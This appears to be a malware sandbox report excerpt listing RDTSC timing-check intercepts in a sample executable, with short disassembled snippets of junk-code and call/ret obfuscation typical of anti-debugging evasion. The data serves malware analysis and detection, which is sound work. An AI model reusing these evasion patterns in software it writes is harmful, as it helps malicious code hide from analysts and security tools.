Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1826D69 second address: 1826D70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1826D70 second address: 1826D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jnc 00007F7B99161518h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7B99161526h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1826E11 second address: 1826E15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1826EC2 second address: 1826ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B9916151Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1826ED3 second address: 1826EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 js 00007F7B98E54826h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182743B second address: 182744B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182744B second address: 1827451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1827ABC second address: 1827AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182990C second address: 1829912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1829912 second address: 182994D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 clc 0x0000000a push 00000000h 0x0000000c mov dword ptr [ebp+122D1E66h], edx 0x00000012 mov di, cx 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+122D2766h], eax 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F7B99161522h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jnc 00007F7B99161516h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182994D second address: 1829957 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7B98E54826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182AEDD second address: 182AEE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182AC19 second address: 182AC20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182AC20 second address: 182AC35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7B9916151Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182B6EA second address: 182B6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182CF5A second address: 182CF5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182CF5E second address: 182CF62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182CF62 second address: 182CF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182D81E second address: 182D824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18300E2 second address: 18300F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18300F3 second address: 18300F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182F0F9 second address: 182F0FE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18300F9 second address: 18300FE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1830311 second address: 1830317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18303FA second address: 18303FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18303FE second address: 1830402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1832186 second address: 18321A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F7B98E54836h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18321A9 second address: 18321AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18321AF second address: 18321B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18321B3 second address: 18321B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183312D second address: 1833176 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7B98E5482Eh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov edi, 5725848Bh 0x00000011 push 00000000h 0x00000013 mov di, CC8Ah 0x00000017 push 00000000h 0x00000019 xor dword ptr [ebp+122D20A9h], eax 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jbe 00007F7B98E54826h 0x00000029 jmp 00007F7B98E54836h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183230F second address: 1832315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1832315 second address: 1832319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18343DE second address: 18343FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B99161528h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1835359 second address: 1835373 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E5482Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F7B98E5482Eh 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1835373 second address: 1835406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 jmp 00007F7B99161522h 0x0000000b push dword ptr fs:[00000000h] 0x00000012 jmp 00007F7B9916151Bh 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e jmp 00007F7B9916151Fh 0x00000023 mov eax, dword ptr [ebp+122D0245h] 0x00000029 pushad 0x0000002a mov ecx, 43A1BE4Eh 0x0000002f cmc 0x00000030 popad 0x00000031 push FFFFFFFFh 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F7B99161518h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d xor edi, dword ptr [ebp+122D3A19h] 0x00000053 nop 0x00000054 jc 00007F7B99161520h 0x0000005a pushad 0x0000005b pushad 0x0000005c popad 0x0000005d jng 00007F7B99161516h 0x00000063 popad 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 je 00007F7B9916151Ch 0x0000006d jns 00007F7B99161516h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18377E5 second address: 18377EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7B98E54826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18386BD second address: 18386CD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7B99161516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18386CD second address: 18386D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18377EF second address: 1837880 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F7B99161518h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F7B99161518h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 js 00007F7B99161516h 0x0000004c jl 00007F7B9916151Ch 0x00000052 mov dword ptr [ebp+122D1E70h], ecx 0x00000058 mov dword ptr fs:[00000000h], esp 0x0000005f mov ebx, dword ptr [ebp+122D1C6Fh] 0x00000065 mov eax, dword ptr [ebp+122D0FFDh] 0x0000006b mov edi, dword ptr [ebp+122D37D9h] 0x00000071 call 00007F7B9916151Bh 0x00000076 clc 0x00000077 pop edi 0x00000078 push FFFFFFFFh 0x0000007a movzx edi, si 0x0000007d push eax 0x0000007e push esi 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18395A7 second address: 18395AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18395AB second address: 18395B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183A632 second address: 183A63C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7B98E5482Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183A63C second address: 183A6A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jno 00007F7B9916151Ch 0x0000000f mov bx, ax 0x00000012 push 00000000h 0x00000014 movsx ebx, ax 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F7B99161518h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 mov edi, dword ptr [ebp+122D37F9h] 0x00000039 xchg eax, esi 0x0000003a jmp 00007F7B9916151Eh 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push ebx 0x00000043 jmp 00007F7B99161525h 0x00000048 pop ebx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183A6A7 second address: 183A6B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F7B98E54826h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183B524 second address: 183B52A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183A7B0 second address: 183A7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183A7B4 second address: 183A7BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183B718 second address: 183B71C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183B71C second address: 183B720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183D4C8 second address: 183D4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183B720 second address: 183B726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183D4D4 second address: 183D52E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F7B98E54828h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov ebx, esi 0x00000024 push 00000000h 0x00000026 ja 00007F7B98E54827h 0x0000002c push 00000000h 0x0000002e jmp 00007F7B98E54830h 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F7B98E5482Fh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183B726 second address: 183B72C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183D769 second address: 183D76D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183F76B second address: 183F76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183D76D second address: 183D782 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183D782 second address: 183D787 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183F93B second address: 183F956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1847D7E second address: 1847D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1847D87 second address: 1847DA1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7B98E54834h 0x00000008 jmp 00007F7B98E5482Ch 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1847DA1 second address: 1847DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7B99161516h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1847F1A second address: 1847F38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jmp 00007F7B98E5482Dh 0x0000000f jnp 00007F7B98E54826h 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1852894 second address: 18528B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7B9916151Ch 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F7B99161516h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185150F second address: 1851516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1851B43 second address: 1851B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182C1BE second address: 182C1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182C1C2 second address: 182C1F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jl 00007F7B99161516h 0x00000013 jmp 00007F7B9916151Dh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1851C73 second address: 1851C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jnc 00007F7B98E54826h 0x0000000e jmp 00007F7B98E54830h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1851C92 second address: 1851CBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161525h 0x00000007 push eax 0x00000008 jmp 00007F7B99161521h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1851CBD second address: 1851CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1851E3E second address: 1851E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1851E44 second address: 1851E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185210F second address: 1852114 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185259F second address: 18525A9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7B98E54826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18525A9 second address: 18525C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7B99161525h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18525C4 second address: 18525EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54836h 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18525EF second address: 18525F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1852710 second address: 1852718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1852718 second address: 185271E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1856F5E second address: 1856F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F7B98E54826h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1856F6E second address: 1856FAA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jo 00007F7B99161516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F7B99161521h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F7B99161526h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1855E01 second address: 1855E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7B98E54826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1855E0B second address: 1855E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1855E0F second address: 1855E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F7B98E54832h 0x0000000c jbe 00007F7B98E54826h 0x00000012 jo 00007F7B98E54826h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18240A2 second address: 18240A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18240A7 second address: 18240BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B98E54830h 0x00000009 rdtsc
